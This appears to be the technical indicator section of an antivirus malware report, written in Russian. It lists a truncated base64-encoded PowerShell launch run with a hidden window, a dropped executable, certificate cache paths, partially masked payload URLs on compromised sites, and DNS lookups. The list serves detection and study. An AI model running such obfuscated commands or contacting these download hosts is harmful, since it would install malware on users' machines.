Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABFAHYAaQB6AGsAbAByAGwAPQAnAFoAcAB4AGwAbQBwAGoAZQBzAGYAdQAnADsAJABOAGEAegBjAHkAagB0AGIAdABiAGgAdwBqACAAPQAgACcAOAA3ADkAJwA7ACQAUABqAGkAZwB6AGcAeQBpAHUAawB4AHYAegA9ACcATAB2AHAAYgBwAHoAdQB3AH...
- %WINDIR%\serviceprofiles\networkservice\appdata\locallow\microsoft\cryptneturlcache\metadata\f0accf77cdcbff39f6191887f6d2d357
- %WINDIR%\serviceprofiles\networkservice\appdata\locallow\microsoft\cryptneturlcache\content\f0accf77cdcbff39f6191887f6d2d357
- %HOMEPATH%\879.exe
- %HOMEPATH%\879.exe
- http://ta###hesht.ir/images/Provx00a/
- http://x.##2.us/x.cer
- http://tc###tner.ru/wp-includes/nr8/
- http://te####n.utcc.ac.th/wp-admin/SquR/
- http://ou####ductreview.in/pokjbg746ihrtr/a1kzwc/
- DNS ASK ta###hesht.ir
- DNS ASK co###rtable.io
- DNS ASK x.##2.us
- DNS ASK x.####gedtrk.com
- DNS ASK ho###pshub.com
- DNS ASK ta###group.ir
- DNS ASK tc###tner.ru
- DNS ASK te####n.utcc.ac.th
- DNS ASK ou####ductreview.in
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABFAHYAaQB6AGsAbAByAGwAPQAnAFoAcAB4AGwAbQBwAGoAZQBzAGYAdQAnADsAJABOAGEAegBjAHkAagB0AGIAdABiAGgAdwBqACAAPQAgACcAOAA3ADkAJwA7ACQAUABqAGkAZwB6AGcAeQBpAHUAawB4AHYAegA9ACcATAB2AHAAYgBwAHoAdQB3AH...' (со скрытым окном)